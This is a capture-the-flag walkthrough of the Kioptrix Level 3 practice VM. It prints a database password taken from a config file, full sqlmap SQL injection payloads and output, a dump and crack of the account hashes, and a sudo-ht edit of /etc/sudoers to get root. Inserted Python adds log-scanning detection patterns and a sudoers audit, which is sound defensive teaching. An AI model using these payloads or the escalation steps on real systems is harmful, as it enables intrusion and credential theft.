This challenge contains a Web Application.

If you have any questions, please direct them to:
comms[at]kioptrix.com
Hope you enjoy this challenge.
-Kioptrix Team

Ubuntu 8.04.3 LTS \n \l

cat /etc/debian_version
lenny/sid

uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Something I missed at first, in the gallery config:
cat gconfig.php

<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";


http://kioptrix3.com/phpmyadmin/

SELECT * FROM `dev_accounts` WHERE 1 LIMIT 0, 30

id  username    password
1   dreg        0d3eccfb887aabd50f243b3f155c0f85   <- Mast3r
2   loneferret  5badcaf789d3d1d09794d8f021f40f0e   <- starwars

(The values after the arrows are the plaintexts recovered for each hash.)



Something even easier, which I found in other reviews:

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:04:27

[04:04:27] [INFO] resuming back-end DBMS 'mysql' 
[04:04:27] [INFO] testing connection to the target URL
[04:04:27] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:04:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:04:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[04:04:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[04:04:27] [INFO] fetching database names
[04:04:28] [INFO] the SQL query used returns 3 entries
[04:04:28] [INFO] retrieved: information_schema
[04:04:28] [INFO] retrieved: gallery
[04:04:28] [INFO] retrieved: mysql
available databases [3]:                                                       
[*] gallery
[*] information_schema
[*] mysql

[04:04:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:04:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'


sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:08:55

[04:08:55] [INFO] resuming back-end DBMS 'mysql' 
[04:08:55] [INFO] testing connection to the target URL
[04:08:55] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:08:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:08:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[04:08:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[04:08:55] [INFO] fetching tables for database: 'gallery'
[04:08:55] [INFO] the SQL query used returns 7 entries
[04:08:56] [INFO] retrieved: dev_accounts
[04:08:56] [INFO] retrieved: gallarific_comments
[04:08:56] [INFO] retrieved: gallarific_galleries
[04:08:56] [INFO] retrieved: gallarific_photos
[04:08:56] [INFO] retrieved: gallarific_settings
[04:08:56] [INFO] retrieved: gallarific_stats
[04:08:56] [INFO] retrieved: gallarific_users
Database: gallery                                                                                  
[7 tables]
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+

[04:08:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:08:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 04:08:56

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:32:50

[03:32:50] [INFO] testing connection to the target URL
[03:32:51] [INFO] heuristics detected web page charset 'ISO-8859-2'
[03:32:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[03:32:51] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[03:32:51] [INFO] testing if the target URL is stable
[03:32:52] [INFO] target URL is stable
[03:32:52] [INFO] heuristics detected web page charset 'ascii'
[03:32:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[03:32:52] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[03:32:52] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:33:11] [WARNING] reflective value(s) found and filtering out
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[03:33:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[03:33:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[03:33:14] [INFO] testing 'MySQL inline queries'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:33:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[03:33:24] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[03:33:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:33:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:33:25] [INFO] target URL appears to be UNION injectable with 6 columns
[03:33:25] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics
[03:33:25] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[03:33:25] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[03:33:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:33:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[03:33:43] [INFO] fetching current database
[03:33:43] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 3 entries
[03:33:43] [INFO] the SQL query used returns 3 entries                      
[03:33:43] [INFO] retrieved: id
[03:33:43] [INFO] retrieved: int(10)
[03:33:43] [INFO] retrieved: username
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] retrieved: password
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 2 entries
[03:33:44] [INFO] retrieved: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[03:33:44] [WARNING] automatically patching output having last char trimmed
[03:33:44] [INFO] retrieved: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[03:33:44] [INFO] analyzing table dump for possible password hashes          
[03:33:44] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[03:33:56] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt.gz
[03:34:19] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[03:34:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[03:34:26] [INFO] starting 2 processes
[03:34:27] [INFO] cracked password 'Mast3r' for user 'dreg'                  
[03:34:30] [INFO] cracked password 'starwars' for user 'loneferret'          
[03:34:31] [INFO] postprocessing table dump                                  
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

[03:34:31] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[03:34:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 21 times
[03:34:31] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 03:34:31
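
As an added example that is not part of the original write-up: the three payload shapes sqlmap reports above (a numeric tautology, a SLEEP() call, and a UNION ALL SELECT bracketed by hex markers) are easy to spot in a web server's access log. The Python below is mine, not sqlmap's or the gallery application's; the log lines are constructed in Apache combined format, and the signature list is an assumption about what a defender would look for.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not real server logs) that carry the three
# injection shapes sqlmap reported above: boolean tautology, SLEEP-based, and UNION.
SAMPLE_LOG = """\
192.168.180.1 - - [05/Jul/2016:03:33:14 -0400] "GET /gallery/gallery.php?id=-9800%20OR%206056%3D6056%23 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev-nongit-201606170a89 (http://sqlmap.org)"
192.168.180.1 - - [05/Jul/2016:03:33:24 -0400] "GET /gallery/gallery.php?id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ZmZi) HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev-nongit-201606170a89 (http://sqlmap.org)"
192.168.180.1 - - [05/Jul/2016:03:33:25 -0400] "GET /gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%20CONCAT(0x716a767a71,0x41,0x71766a6b71),NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 500 812 "-" "sqlmap/1.0-dev-nongit-201606170a89 (http://sqlmap.org)"
192.168.180.50 - - [05/Jul/2016:03:35:01 -0400] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# (label, pattern) pairs applied to the URL-decoded query string, in this order.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("time-based-sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("boolean-tautology", re.compile(r"\b(?:or|and)\s+(\d+)\s*=\s*\1\b", re.I)),
    ("hex-marker-concat", re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I)),
    ("comment-terminator", re.compile(r"--\s|#")),
]

def classify_query(query: str) -> list[str]:
    """Return the labels of every signature that matches a decoded query string."""
    return [label for label, rx in SIGNATURES if rx.search(query)]

def scan_access_log(log_text: str) -> list[dict]:
    """Flag requests whose query string or User-Agent points to automated SQL injection."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-format line; skip it
        path, _, raw_query = m["target"].partition("?")
        labels = classify_query(unquote_plus(raw_query))
        if "sqlmap" in m["ua"].lower():    # default sqlmap User-Agent; trivially changed by an attacker
            labels.append("sqlmap-user-agent")
        if labels:
            findings.append({"ip": m["ip"], "path": path,
                             "status": int(m["status"]), "indicators": labels})
    return findings
```

The 500 responses sqlmap itself warns about (21 of them during the dump) are a second, signature-free signal: a burst of server errors on one parameter from one client is worth an alert even when the payload is obfuscated.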

ssh loneferret@kioptrix3.com
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$

sudo su
[sudo] password for loneferret: 
Sorry, user loneferret is not allowed to execute '/bin/su' as root on Kioptrix3.

export TERM=xterm
sudo ht

Shadow:
root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7::: 

Edit /etc/sudoers in ht (which sudo runs as root) and add a full grant for loneferret:
# User privilege specification
root    ALL=(ALL) ALL
loneferret ALL=(ALL) ALL

loneferret@Kioptrix3:/usr/local/bin$ sudo ht /etc/sudoers
loneferret@Kioptrix3:/usr/local/bin$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/usr/local/bin# whoami
root
root@Kioptrix3:/usr/local/bin#
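
Added example, not from the original post: the sudoers grant that permitted `sudo ht` is the real weakness in this step, because an editor running as root can rewrite /etc/sudoers itself, which is exactly what the session above does. The Python audit below is mine; the sudoers excerpt is constructed, and the line permitting ht is an assumed shape consistent with the session (su refused, ht allowed), not the VM's actual file.

```python
import re

# Constructed sudoers excerpt for the audit; it is not the VM's real /etc/sudoers. Line 3
# is an assumed shape consistent with the session above (su refused, ht permitted), and
# line 4 is the grant the session adds by editing the file through ht.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL) ALL
loneferret ALL=(ALL) !/bin/su, /usr/local/bin/ht
loneferret ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /sbin/reboot
"""

# Programs that, run as root, can write arbitrary files or spawn a shell. Any of them
# yields effective root, so an entry naming one is reported like an "ALL" entry.
ESCAPE_CAPABLE = {"ht", "vi", "vim", "nano", "emacs", "less", "more", "man", "find", "awk"}

# user  hosts=(runas) [TAG:] cmd, cmd ...
USER_SPEC = re.compile(r"^(?P<user>\S+)\s+(?P<hosts>\S+)=(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")
TAG = re.compile(r"^(?:(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*)+")

def audit_sudoers(text: str) -> list[tuple[int, str, str, str]]:
    """Return (line, user, command, reason) for every non-root grant that yields full root."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue                          # comments and Defaults lines carry no grants
        m = USER_SPEC.match(line)
        if not m or m["user"] == "root":
            continue
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            spec = TAG.sub("", cmd)
            if spec.startswith("!"):
                continue                      # a deny entry adds no capability by itself
            if spec == "ALL":
                findings.append((lineno, m["user"], cmd, "ALL: unrestricted root"))
                continue
            prog = spec.split()[0].rsplit("/", 1)[-1]
            if prog in ESCAPE_CAPABLE:
                findings.append((lineno, m["user"], cmd,
                                 f"{prog} runs as root and can rewrite /etc/sudoers or spawn a shell"))
    return findings
```

Denying /bin/su while allowing an editor changes nothing, as the audit shows; where a user genuinely needs to edit root-owned files, `sudoedit` limited to specific paths is the grant that does not hand over the sudoers file.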


root@Kioptrix3:/usr/local/bin# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.


Best Regards,
Yuriy Stanchev/URIX